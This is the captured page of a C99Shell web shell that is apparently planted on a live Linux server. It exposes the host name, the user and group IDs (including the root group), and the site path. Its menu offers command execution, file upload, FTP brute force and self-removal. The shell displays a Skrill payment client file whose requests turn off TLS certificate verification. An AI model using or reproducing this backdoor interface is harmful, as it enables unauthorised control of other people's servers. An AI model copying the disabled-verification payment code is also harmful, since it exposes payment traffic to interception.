!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/obydul/laraskrill/src/   drwxr-xr-x
Free 28.53 GB of 117.98 GB (24.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SkrillClient.php (2.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Obydul\LaraSkrill;

use 
Illuminate\Support\Facades\Http;

class 
SkrillClient
{
    
/** Skrill payment and refund URL */
    
const PAY_URL 'https://pay.skrill.com';
    const 
REFUND_URL 'https://www.skrill.com/app/refund.pl';

    
/** @var  SkrillRequest $request */
    
private $request;

    
/** @var  string $sid */
    
private $sid;

    
/**
     * SkrillClient constructor.
     * @param SkrillRequest $request
     */
    
public function __construct(SkrillRequest $request null)
    {
        if (
$request != null$this->request $request;
        else echo 
"<h2>Exception, you need to set SkrillRequest!</h2><br>";
    }

    
/**
     * Generate SID
     */
    
public function generateSID()
    {
        
// send request to skrill
        
return Http::withoutVerifying()
            ->
withOptions(["verify" => false])
            ->
post(self::PAY_URL$this->request->toArray())
            ->
body();
    }

    
/**
     * Generate payment URL
     */
    
public function paymentRedirectUrl($sid null)
    {
        
$this->sid $sid;
        if (!
$this->sid) {
            
$this->sid $this->generateSID();
        }
        return 
self::PAY_URL "?sid={$this->sid}";
    }

    
/**
     * Prepare for full and partial refund
     * @return bool|string
     */
    
public function prepareRefund()
    {
        
// add required refund fields
        
$this->request->action 'prepare';

        return 
Http::withoutVerifying()
            ->
withOptions(["verify" => false])
            ->
post(self::REFUND_URL$this->request->toArray())
            ->
body();
    }

    
/**
     * Do full and partial refund
     * @return bool|string
     */
    
public function doRefund()
    {
        
// add action
        
$this->request->action 'refund';

        return 
Http::withoutVerifying()
            ->
withOptions(["verify" => false])
            ->
post(self::REFUND_URL$this->request->toArray())
            ->
body();
    }

    
/**
     * @return SkrillRequest
     */
    
public function getRequest()
    {
        return 
$this->request;
    }

    
/**
     * @param SkrillRequest $request
     */
    
public function setRequest($request)
    {
        
$this->request $request;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]--